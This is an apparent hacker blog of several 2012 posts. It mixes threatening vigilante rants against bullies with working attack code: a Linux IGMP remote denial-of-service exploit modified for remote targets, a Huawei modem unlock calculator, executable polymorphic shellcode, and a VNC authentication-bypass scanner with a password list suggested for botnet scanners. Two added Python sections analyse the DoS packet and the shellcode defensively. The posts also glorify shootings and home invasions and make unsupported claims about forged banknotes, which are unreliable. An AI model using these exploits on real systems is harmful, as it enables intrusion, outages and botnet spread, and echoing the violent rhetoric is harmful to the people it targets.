
[Bully Breakdown]: Well-knowledged IT_Sec father of a daughter shoots up her laptop, for she was a bully…

Posted on 11th February 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

I guess the video will say it all, eh?

 

This was the FATHER of a bullying, rebellious young FaceBook teenager… she must have had big balls, trying to get this over her own dad :S

Also, this is an example of the world's response to bullies, and of the BullyBreakdown project, of which I am the author…

You will find MANY more like this, and this hit the news here.. Channel 10/7/9, you know… it ain't *small*, and it ain't behind any monitors anymore… just remember that, (s)kids ;)

This will only get worse if these wannabe SOPA and DARPA people get their way….

Anyhow folks, enjoy a GREAT vid!

 

 

XD / worldwide … army of unrepentant nomadz

On behalf of MMA (Au) and Dana (MMA USA), and all against the bullies online!


BULLY BREAKDOWN! This is the gospel of the ….

Posted on 31st January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Here is some help with how I have watched things and how I react… I am not in any way affiliated with the people shown below.

BUT, I can say, big brothers are now online, and will punish the naughty boys and gals.

This will be brutal and significant: assimilation and annihilation of small groups who try to destroy people and places they NEVER knew EVER existed… and will still remain nonexistent….

Brothers In Arms ..

Remember, what happens ONLINE could also happen OFFLINE…

In times of war…

http://www.fiveaa.com.au/article_man-shot-at-munno-para-west_111377

Shit happens…

^^ For those who annoy… too much… sometimes this is the ONLY way…

In the end, it is basically like this for the bullies..

http://www.break.com/index/the-best-of-the-worst-parkour-edition-2294595

http://video.couriermail.com.au/2189968224/Horrifying-home-invasion?area=videoindex7

Poor, poor wannabe bullies only get ONE thing.

 

http://video.couriermail.com.au/2191276513/Comanchero-home-movie?area=videoindex4

^^RESPECT

 

RECURSIVE FORCE!

Now the power within you is maybe a little stronger… don't be afraid of ONLINE and OFFLINE BULLIES, use their own weapons against them, and may peace be with you all, especially the youth…

And for all the rest, I guess you should be LOYAL and follow some things you see offline, online…

Remember, treat others how YOU would want to be treated.. or face the wrath of many now-empowered people…

JACK THE RIPPER

R.I.P Giove ..

Words of Wisdom, things you MUST know…

Posted on 29th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

My name, I will not give you… but, this is as good as…

I was 11 when I first used a Commodore 64, then became trained by someone even younger than me to run warez; he was 10, and gave me EVERY componentry he had, to show nme what I needed…
I am FUGiTiVE.ACU (Australian Crackers United), later then formed with ParaDOX/ANGELS, then started a splinter cell group here…. I owned AT&T; there were NO laws then, so their method was brutality.
Simple, they rang my house at all times of day, even to speak with me (CIA) and USA feds, and eventually they got to my father…. this is when I was forced, with Police in tow, to sell the PC in FRONT of their eyes, and never come back, ever… these are things only the very old members will know, and this happened… look for me on any .AU warez from Amiga 500; the Firestarters was the first group I was in….

Anyhow, this is NOT about hate…. it is about allowing people to control you.
I was a sleeper cell unit/cluster of friends, VERY close, who only commune IRL; you people should use the old team codes… believe me, the law will not hurt you… if you're trained.
To some of the people who can only DDoS, I understand, but I beg, please ask the elders to be schooled; don't fight.. for we will lose the most precious FUCKUP in history…
USE their weaponry and mistakes; this is the way of the warrior online, for if you attack only with DDoS etc., this will not get voiced, but if you school them, they really are bound by laws, through France, Italy, Brasil/Rio/Barcelona, UK… these are splinter groups I PERSONALLY trained with mouse_, for this reason….
NOW, we are awake… and my teams will start to move in on anti-warez..

Be strong, as it will look like shit for a bit, but as I mentioned, when the Sleepers movie was made, it had nothing to do with this; we borrowed their names, as they waited, and had vengeful justice, and lived through it; the deaths of 2 still made sure ONE was OK.
This is the MOB mentality you MUST adopt, and it is HARD… but ask Mouse_ how hard I am, ask others how hard I am, and why I am here..
I am no idiot… mark my words.. be strong, UNITE, for united you stand, alone you fall; learn to code a little, not much, as they have already messed it so much that there are other groups at work now, picking them to pieces; reverse engineering skill is not a base of hacking, but it is often the most powerful weapon ya have… stay strong Aussies, and unite as I did… this is NOT hate, this is love, for my country, my voice, and the Net.
XD / FUGiTIVE

Remember at the end of “SLEEPERS” (Movie), who did win???

nme, and anyone else trying to ring me, don't.. there are reasons, think ;) later buddies….


Aussies, unite, look at your $50 notes… now read on… for you, I lay my life down… xd / Fugitive/ACUParadox/Angels/Paranoimia, head of AU relations with French warez, CORE, PARANOiMIA (USA – Snow / USA ex CORE) may the phorce now be with you…

Posted on 28th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Australians,
May I beg one minute of your time, and please, I have also tried to get the pictures up, and just cannot for the life of me, but however, the details are now given..

On the $50 AUD note, take a look.

there is specifically a bug with the ‘forged’ copies; they are in 4 areas..

A. the top numbering.. look for the ones which start with a 9, not a 0; this is easy now, as they're EVERYWHERE
B. look underneath the notes which have the 9 numbers, and look underneath both photos; there will be two important names missing.. this is the second feature
C. look at the signatures on the 9-digit notes; this will also be different…

The ones which are bad will have all 4 bugs; the good AUD is not with these.. there are reasons..
9 because the reserve bank simply works on population, per capita.. this == our economy…
These notes were made so well, the banks will deny of course… but it is not so easy to hide now you can see what I am seeing, daily.. and live with…
You now hold my life in your hands.
May the force be with you, for, this will not be for me..
amen.
XD

[NEWS]: DONT BE SCARED ONLiNE!

Posted on 27th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

TO clarify why etc. is easy now, and I think all crews now understand: this was never hate, but only ever love… for the scene, and for freedom!

This is to respect ALL the people who have in some way helped; please be nice to them… some names …
ISG/magikh0e/peanuter/ac1db1tch3z/Mouse_/tropic/nme … may the phorce be with you!
This is what could have happened online.. I am trying to silence this post, but it will only be a reminder of what can happen when the ‘kids’ get involved in man's business, or woman's, but you must learn and understand what a prodigy child is.. and respect them….

—> this is going to be closed today, as it will only be up because silly ppl got involved in things they never knew about to begin with.. but I do respect these people and I can honestly say I hate this WP :P coz I'm trying to make it already for only admins or regged/admin users who were invited here.. so it will be done and closed to the public, but will always serve as a great reminder.. for I have passed the torch to the same people I once abused….
Times change, and especially when ya fuck wit the warez!!

 


[DoS]: Code of ‘Undead’ attack by KCOPE. But this seems to be REMOTE, not just LAN based; GREAT for learning about DoS, about ICMP/IGMP/TCP/IP, packet sequences, and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

I'll just put the straight-up crappy PoC up, which was on the FD lists, right or wrong; this can attack OUTSIDE the LAN or WLAN :P
So, use some thinking, maybe update this post with your OWN version for a change.
Go hard… I will have a closer look when I have more time, but I know that my exploit for Windows is set up in similar fashion, and this is simply because of the way IGMP and ICMP membership bugs read things, so it had to be at the least 0.0.0.0; localhost would fail… as that's an IP… so, I guess, good luck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code, which can attack NOT just LAN, is NOT kcope's and is based more on the ICMPv3 membership query bug... which was for Windows but also affects Linux, in IGMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine, and since it doesn't care what the IPs are, I guess results could be seen remotely... feel free to update/send in comment... all comments go thru ME, XD, before any type of publishing, so be sure that codes are safe and I only put here corrected codes... simple... so, please don't go adding it to your lame d0s collection coz I'll just fark it up, and, I mean, the packet is easy to block since it is released... right
** XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
  if (sendto(s, &buf, sizeof(struct iphdr)+8, 0, (struct sockaddr *)&dst, sizeof(struct sockaddr_in)) == -1) {
    perror("Error sending packet");
    exit(-1);
  }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
  if (sendto(s, &buf, sizeof(struct iphdr)+12, 0, (struct sockaddr *)&dst, sizeof(struct sockaddr_in)) == -1) {
    perror("Error sending packet");
    exit(-1);
  }
  return(0);
}
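For the defensive side of the packet sequence above, here is an added Python 3 example; it is not part of the original post or of the PoC, it is mine. It parses an IPv4 datagram carrying IGMP, verifies both RFC 1071 checksums (the same arithmetic as in_chksum() in the C above), and flags the shape of the second packet the PoC sends: a 12-byte, IGMPv3-length membership query whose Max Resp Code is 0. It also flags any IGMP message that arrives with a TTL other than 1, which RFC 3376 requires. The two sample datagrams are constructed for this example with precomputed checksums; they are not captured traffic, and a real deployment would feed the function frames from a capture.

```python
import struct

IPPROTO_IGMP = 2
IGMP_MEMBERSHIP_QUERY = 0x11


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; over a header that already carries its checksum the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def inspect_igmp(datagram: bytes) -> dict:
    """Parse one IPv4 datagram and list anything a defender should look at in its IGMP message.

    Returns the parsed fields plus a 'findings' list; an empty list means nothing odd was seen.
    """
    findings = []
    if len(datagram) < 20 or datagram[0] >> 4 != 4:
        return {"findings": ["not an IPv4 datagram"]}
    ihl = (datagram[0] & 0x0F) * 4
    tot_len = struct.unpack("!H", datagram[2:4])[0]
    ttl, proto = datagram[8], datagram[9]
    if ihl < 20 or tot_len < ihl or len(datagram) < tot_len:
        return {"findings": ["IP length fields do not match the bytes present"]}
    if proto != IPPROTO_IGMP:
        return {"proto": proto, "findings": []}
    if internet_checksum(datagram[:ihl]) != 0:
        findings.append("bad IP header checksum")
    if ttl != 1:
        # RFC 3376 requires IGMP to be sent with TTL 1; anything else is non-conformant or forged.
        findings.append("IGMP with TTL %d (RFC 3376 requires TTL 1)" % ttl)
    igmp = datagram[ihl:tot_len]
    if len(igmp) < 8:
        findings.append("IGMP message shorter than the 8-byte minimum")
        return {"findings": findings}
    mtype, max_resp = igmp[0], igmp[1]
    group = ".".join(str(b) for b in igmp[4:8])
    if internet_checksum(igmp) != 0:
        findings.append("bad IGMP checksum")
    if mtype == IGMP_MEMBERSHIP_QUERY and len(igmp) >= 12 and max_resp == 0:
        # Shape of the second packet the PoC sends: a v3-length query with a zero
        # max response time, which no ordinary querier emits. The length condition
        # matters: IGMPv1 queries are 8 bytes and legitimately carry 0 in this byte.
        findings.append("IGMPv3-length membership query with Max Resp Code 0")
    return {"type": mtype, "max_resp": max_resp, "group": group, "ttl": ttl,
            "igmp_len": len(igmp), "findings": findings}


# Constructed sample datagrams (not captured traffic). IPv4 header without options,
# destination 224.0.0.1, checksums precomputed so the parser's verification passes.
SUSPECT_QUERY = bytes.fromhex(
    "45000020476500000102d0c3c0a8010ae0000001"   # IP: len 32, ttl 1, proto 2, src 192.168.1.10
    "1100eeff0000000000000000"                   # IGMP: query, Max Resp Code 0, 12 bytes
)
BENIGN_QUERY = bytes.fromhex(
    "4500001c000100000102" "1835" "c0a80101e0000001"   # IP: len 28, ttl 1, proto 2, src 192.168.1.1
    "1164ee9b00000000"                                 # IGMPv2 general query, Max Resp 10 s
)


def report(label: str, datagram: bytes) -> list:
    result = inspect_igmp(datagram)
    print("%s: %s" % (label, result["findings"] or "ok"))
    return result["findings"]


if __name__ == "__main__":
    report("suspect", SUSPECT_QUERY)
    report("benign", BENIGN_QUERY)
```

Run stand-alone it prints one finding for the suspect query and "ok" for the ordinary IGMPv2 general query. Because the checksums are verified first, a capture that has been mangled in transit shows up as a checksum finding rather than as a false match on the query pattern.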

Huawei E585 and Other Huawei modem unlock code calculator v1.1

Posted on 6th January 2012 in Android, Codes, Papers

This was being searched for by me for ages.. finally I was able to get hold of some older code and play around with stack values; I will be adding a targets base to it soon, but for now, enjoy. Thx to gunslinger for this, it was really needed, and since I don't cover phone shit at all so far, please read on.. this rocks, it really does, and this is from personal use with this device, the E585 only; it is a very very good thing to get to use if you can… for me, it was 28 bux and I'm unlocked :D
Enjoy
xd @ #haxnet / e fnet
DONT become a victim!

#!/usr/bin/python
#   Gunslinger <yudha.gunslinger@gmail.com> http://bit.ly/c0debreaker
#   (Python 2 script; indentation restored, the eval() in the verbose output replaced by the expression it evaluated)
import hashlib, string

__auth__      = "[MULTIPLE PPL]"
__date__      = "DEC 2011"
__version__   = "1.1"
__copyright__ = "Copyright (c) 2011"

class huawei_modem_unlocker(object):
    """
    Instance variables:
    Imei
        Imei of the modem will be calculated
        Default : '0'
    Verbose
        Display how algorithm Is working
        Default : False
    """

    def __init__(self, imei='0', verbose=False):
        ''' Huawei modem unlocker class constructor '''
        self._imei      = imei
        self._verbose   = verbose
        # MD5 of the IMEI with a fixed salt: one salt for the unlock code, one for the flash code
        self._md5u      = hashlib.md5(str(imei)+str('5e8dd316726b0335')).hexdigest()
        self._md5f      = hashlib.md5(str(imei)+str('97b7bc6be525ab44')).hexdigest()
        self._unlock_code   = ''
        self._flash_code    = ''
        self._width     = 21
        self._w         = 10
        self._header_format     = '%-*s%*s'
        self._format            = '   %d  | %-*s | %*s  '

    def xor_digits(self, source, counter):
        ''' XOR the four hex-digit pairs at offsets counter, 8+counter, 16+counter and 24+counter of the digest '''
        digits = int('0x0'+source[0+counter:2+counter],16)  ^ \
                 int('0x0'+source[8+counter:8+2+counter],16)    ^ \
                 int('0x0'+source[16+counter:16+2+counter],16)  ^ \
                 int('0x0'+source[24+counter:24+2+counter],16)
        return digits

    def calc(self):
        ''' Process calculate with the algorithm (read the code) '''
        cnt = 0
        cnt2 = 1
        if self._verbose:
            print "="*(self._width+13)
            print " Iter."+"|"+ " Unlock byte "+"|"+" Flash byte "
            print "-"*(self._width+13)
        while cnt < 8:
            # four iterations, each folding the 32-character digest down to one byte
            digits_unlock = self.xor_digits(self._md5u, cnt)
            digits_flash = self.xor_digits(self._md5f, cnt)
            unlock_byte = string.zfill(hex(digits_unlock)[2:],2)
            flash_byte = string.zfill(hex(digits_flash)[2:],2)
            self._unlock_code = str(self._unlock_code)+str(unlock_byte)
            self._flash_code = str(self._flash_code)+str(flash_byte)
            if self._verbose: print self._format % (int(cnt2), self._width - self._w, self._unlock_code , self._w, self._flash_code)
            cnt  +=2
            cnt2 +=1
        # keep the low 25 bits and set bit 25: 33554431 == 0x1ffffff, 33554432 == 0x2000000
        unlock = int('0x0'+self._unlock_code,16) & 33554431 | 33554432
        flash  = int('0x0'+self._flash_code,16) & 33554431 | 33554432
        if self._verbose:
            print "="*(self._width+13)
            print "\nUNLOCK CODE = %d & %d | %d = %d" % (int('0x0'+self._unlock_code,16), 33554431, 33554432, unlock)
            print "FLASH CODE    = %d & %d | %d = %d\n" % (int('0x0'+self._flash_code,16), 33554431, 33554432, flash)
        self._unlock_code   = unlock
        self._flash_code    = flash
        return (self._unlock_code, self._flash_code)

    def run(self):
        ''' Fire it up ! '''
        self.calc()
        return (self._unlock_code, self._flash_code)

if __name__ == '__main__':
    print "\nHuawei modem unlock code calculator v.%s by %s \n" % (__version__, __auth__)
    inpimei = raw_input("Please input modem IMEI: ")
    cracker = huawei_modem_unlocker(inpimei)
    a, b    = cracker.run()
    print "\n-> IMEI           = %s" % (inpimei)
    print "->   UNLOCK CODE    = %s" % (a)
    print "->   FLASH CODE     = %s" % (b)

Now that's what you would call awesome :> , you won't find this too easy again, my friends.. Pocket WiFi is now unlockable at ALL levels, so please enjoy it… free, thanks to some smart reversing of hardware by gunslinger; props up for this and thanks.. when all others failed, gslinger came through for me :>
Thanks to my channel on EFnet and its members, @ps and friends.. and please, feel free to pop in anytime.. Now, note, this unlocks the modem, so you could now use it alongside your own ISP and thus you would have free WiFi, I believe… but also note, this can handle an Android ROM! Yes, or even Ubuntu installed within it! The E585, and other models above it, have an awesome feature to add a shared SD card, so users logged in can actually share like an ftpd!
These WiFi routers really do rock; I would not have gone through this amount of crap to get a calculator happening for this thing, and have to now maybe check other models and update a few strings…. so it might have a target list next time you see it :)
Again, this will handle a ROM, or work like a small OS/router, and this means you have basically a 5-user (at the least) shell, and that's only if you wish to allow 4 others on it; you could happily connect through it with your own shit.. that's even a very good reason to have this thing unlocked; it really works on whatever phone ISP is being used to access it; when it is unlocked, this means no restrictions on any of its default rules, which are nice and changed by default on unlock.. so you could make a py object file? or a .pyc? or just python file.py on the device SD card, root of SD card… just hook it up to the PC, copy the file to its SD card and root, then enjoy ROM Manager possibly? and I know for a fact it handles a Froyo ROM, so that may be where to start searching on that one :>
ENJOY PPL!
XD @ #HAXNET @ EFNET // Dont become a victim ..

Shellcode: 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode

Posted on 6th January 2012 in Codes, Exploits

SHELLCODE CODE BELOW:

Just some nice people's/coders' stuff, awesome polymorphic generator… (btw soon I will put back up the Linux and BSD polymorphic portbind I have here somewhere from the old website… anyhow… enjoy this shellcode, it is ubercool for stack leaks maybe too ;) or leveraging from one code type to another? idc… you're the coders here… btw, I would still probably be in the coders comp, albeit half the entrants being of a bit shifty and sideways attitudes.. especially the so-called nice guys… anyhow.. enjoy the shit.. this shit don't go to FD… and that's why CC will NEVA ever bow to bs like that crap… and fy0d0r, go funk yaself, for the backups my shit gave to you and the proper, hard and good solid fucking help… go screw yaself fag… this is the second time you have faggoted about like that, I should pay you a nice slapping.
Anyhow.. enjoy the shellcode.. spit on lamer.. /me spitting hard.

////Untouched author code..works fine -xd tested

/*
Title  : Find all writeable folder in filesystem linux polymorphic shellcode
Name   : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode .
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
#include <string.h>   /* strlen() */

char shellcode[] =
   "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
   "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
   "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
   "\xb5\x96\x1d\x29\x34\x34\x34\x9b\x9e\xa3\x99\x55\x64\x55\x62"
   "\xa9\xae\xa5\x9a\x55\x99\x55\x62\xa5\x9a\xa7\xa2\x55\x6c\x6c"
   "\x6c";

int main(void) {
  fprintf(stdout, "-> Length: %zu\n", strlen(shellcode));
  /* jumps into the .data buffer: only runs with an executable data segment (e.g. gcc -z execstack), otherwise it segfaults */
  (*(void(*)()) shellcode)();
  return 0;
}
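As an added example (my code, not gunslinger's and not part of the post), here is how an analyst can read the blob above without executing it. The first 24 bytes are a small decoder stub that walks the remaining 67 bytes backwards and subtracts a constant from each one; the same subtraction can be replayed statically, which is how "polymorphic" encodings of this kind are unpacked on the bench. The bytes are copied from the listing above; the stub layout, and the offsets at which the loop count and the key sit, are read off the disassembly given in the comments.

```python
import re

# The 91-byte blob copied from the listing above; it is only treated as data here.
SHELLCODE = bytes.fromhex(
    "eb115e31c9b143806c0eff3580e901"
    "75f6eb05e8eaffffff9566f56607e5"
    "40879da364a89d9d6464979ebe1887"
    "9d62989898be1687203c8688be1602"
    "b5961d293434349b9ea39955645562"
    "a9aea59a55995562a59aa7a2556c6c"
    "6c"
)

# Byte pattern of the decoder stub; None marks the two variable bytes
# (the loop counter immediate and the subtraction key).
STUB_PATTERN = [
    0xEB, 0x11,                    # jmp short +0x11 (to the call below)
    0x5E,                          # pop esi           ; esi -> encoded payload
    0x31, 0xC9,                    # xor ecx, ecx
    0xB1, None,                    # mov cl, COUNT     ; payload length
    0x80, 0x6C, 0x0E, 0xFF, None,  # sub byte [esi+ecx-1], KEY
    0x80, 0xE9, 0x01,              # sub cl, 1
    0x75, 0xF6,                    # jnz back to the sub
    0xEB, 0x05,                    # jmp short +5 (into the decoded payload)
    0xE8, 0xEA, 0xFF, 0xFF, 0xFF,  # call back to 'pop esi' (pushes the payload address)
]
STUB_LEN = len(STUB_PATTERN)  # 24
COUNT_OFFSET, KEY_OFFSET = 6, 11


def decode_sub_stub(blob: bytes):
    """Recognise the stub and undo its per-byte subtraction without running anything.

    Returns (count, key, decoded_payload); raises ValueError if the stub is not present
    or the payload is shorter than the stub claims.
    """
    if len(blob) < STUB_LEN:
        raise ValueError("blob shorter than the decoder stub")
    for i, expected in enumerate(STUB_PATTERN):
        if expected is not None and blob[i] != expected:
            raise ValueError("decoder stub mismatch at offset %d" % i)
    count, key = blob[COUNT_OFFSET], blob[KEY_OFFSET]
    payload = blob[STUB_LEN:STUB_LEN + count]
    if len(payload) != count:
        raise ValueError("stub says %d payload bytes but only %d present" % (count, len(payload)))
    # The loop runs ecx = count .. 1 and subtracts KEY from [esi+ecx-1], so every
    # payload byte is decoded exactly once, modulo 256.
    decoded = bytes((b - key) & 0xFF for b in payload)
    return count, key, decoded


def printable_strings(data: bytes, min_len: int = 4):
    """Crude 'strings' over the decoded bytes."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


if __name__ == "__main__":
    count, key, plain = decode_sub_stub(SHELLCODE)
    print("payload length 0x%02x, key 0x%02x" % (count, key))
    print("decoded:", plain.hex())
    for s in printable_strings(plain):
        print("string:", s.decode())
```

Running it shows a plain execve shellcode underneath: pushad, xor eax/edx, mov al,0x0b, two pushes that build "//bin/sh" on the stack, a 4-byte "-ccc" that sh accepts as -c, and a call that supplies the trailing string "find / -type d -perm 777" as the command. That matches the title, and it is the kind of check worth doing before any PoC from a forum is allowed to run on a lab box.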

End 1337 shellcode, and I ain't kidding, it is fucking leet, and it is coded for a REASON, so please, for those who think it is crap, wonder why it was actually private shellcode for like 2009 or so… fucking,…. have to give these things out every now and then, and times are here… many links also in my channel on EFnet, of rootkits, other apps and skynet kits etc, all the ‘leet’ shit.. I'll sell it, for we will discuss this… maybe on EFnet.
CHEERS!
XD
#HAXNET, #HAXSHELLS, #MAGUCSHELLS, and cheers to the leet of the leet who are the @ps in #Haxnet; you want leet, you got it… bitchez.
Now go make something useful…ftw.
XD v2

Fun with VNCs – Some codes which may be useful for you …

Posted on 7th December 2011 in Codes, Exploits, Papers

# OK well, I'll get right into it.
# The easiest bypass for VNC is the AUTH challenge code; ok, now open up some WinVNC code (remember, most VNCs are
# actually based on this, or even a TightVNC code…), anyhow, in many versions you will find there is a part
# somewhere like this:

#define AUTH_CHALLENGE %s%s%s%s%s%s%s%s
#define CHALLENGE %s%s%s%s%s%s%s%s
#or:

#define AUTH_PWD %s%s%s%s%s%s%s%s

Depends on the code so.. ok, we have the most simple of buffer overflows, no boundary checks, because, well, look at it :s; then in the code it ONLY checks the auth on those 8 digits… ok so for example, if you want to break VNC, you must know one thing… passwords can be longer or shorter, but you cannot bruteforce VNC with 100-password lists :P
you would be lucky to get 3 goes, so guess what your BEST password would be??
123456789
simply add this into your scanner for rBot etc… and then maybe more… because the next b0f I cannot disclose, as it is actively exploitable still on ALL OS, as the 8-digit one should still be.. on many… and I do test NEW corp releases etc. against the auth bypass which does a decrypt on the host; that's NOT disclosed, and people have called me crazy for even trying, but I have the code which says that's bs… and I showed some of this to the botting community…. anyhow… the problem with most bruters is simply they don't have an easy passlist… and believe me, the best is this list here:
123456789
1234
123
vnc
master
letmein
-> no more than 6 passes, but these will always be good enough, believe it…
OK so, the third section is simply to give you guys a few older codes… and maybe, if you're lucky enough, you will sometimes get chances to use them, using MY viewer, which does NULL auth bypass no problem, BUT null is shitty, you want to decrypt ;) and sorry, but that code is still pvt after 5 yrs now…
Anyhow…moving on…

Some codes:

Perl scanner which is VERY good, but you might want some listings to better attack versions… :

#!/usr/bin/perl
use strict;

my $target = shift;
die "Usage: $0 <ip/host>\n" unless $target;
my $scanner = VNCScanner->new;
$scanner->scan($target);
package VNCScanner;
use IO::Socket::INET;

sub new {
    my ($class) = @_;
    my $self = {};
    return bless $self, $class;
}
*socket = \&sock;
sub sock { $_[0]->{sock} }

sub scan {
    my ($self, $host) = @_;
    my $socket = IO::Socket::INET->new(
                                       PeerAddr => $host,
                                       PeerPort => '5900',
                                       Proto    => 'tcp',
                                       ) or warn "Error connecting to $host: $!\n";
    if ($socket && $socket->connected) {
        $self->{sock} = $socket;
        $self->connect;
    }
}

sub connect {
    my $self = shift;
    my $socket = $self->sock;
    # read protocol version
    my $proto_v;
    $socket->read($proto_v, 12);
    $proto_v ||= '';
    chomp $proto_v;
    my ($maj_v, $min_v) = $proto_v =~ /RFB (\d+)\.(\d+)/;
    $self->{maj_v} = $maj_v;
    $self->{min_v} = $min_v;
    $self->log("Found RFB server ($maj_v.$min_v)");
    if ($maj_v == 3) {
        $self->auth;
    } elsif ($maj_v) {
        $self->log("Unknown RFB version $maj_v");
    } else {
        $self->log("Unknown RFB version response: $proto_v");
    }
}

sub auth {
    my $self = shift;
    my $sock = $self->sock;
    if ($self->{min_v} >= 7) {
        # do v. 7 auth
        $sock->print("RFB 003.007\n");                     ## this is type most UNiX use :P ~~ -xd
        # should receive 1 byte count of auth types
        my $sec_t_cnt;
        $sock->read($sec_t_cnt, 1);
        if ($sec_t_cnt) {
            # read array of auth types
            my $sec_t_array;
            $sock->read($sec_t_array, int($sec_t_cnt));
            # try auth bypass
            $sock->print(pack('C', 0x01)); # auth type none  NULL BYPASS here... but this is basic and crude -xd
            $self->check_auth_resp;
        } else {
            my $err_str_len;
            $sock->read($err_str_len, 4);
            $err_str_len = unpack('N', $err_str_len) + 0;
            my $err_str;
            $sock->read($err_str, $err_str_len);
            $self->log("Got auth error: $err_str");
        }
    } else {
        # request version 3.3 auth
        $sock->print("RFB 003.003\n");
        # should get a type back
        my $sec_t;
        $sock->read($sec_t, 4);
        $sec_t = unpack('N', $sec_t);
        unless ($sec_t) {
            $self->log("Auth rejected");
            return;
        }
        if ($sec_t == 1) {
            # no auth, yay
            $self->log("No auth required!");
        } else {
            $self->log("Auth type $sec_t requested. Giving up.");
        }
    }
}

sub check_auth_resp {
    my $self = shift;
    my $sock = $self->sock;
    # read securityresult
    my $sec_res;
    $sock->read($sec_res, 4);
    $sec_res = unpack('N', $sec_res);
    if ($sec_res == 0) {
        # we're in!
        $self->log("Connected successfully!");
    } else {
        # read reason
        my $err_str_len;
        $sock->read($err_str_len, 4);
        $err_str_len = unpack('N*', $err_str_len) + 0;
        my $err_str;
        $sock->read($err_str, $err_str_len);
        $self->log("Error in authentication: $err_str");
        # server will disconnect
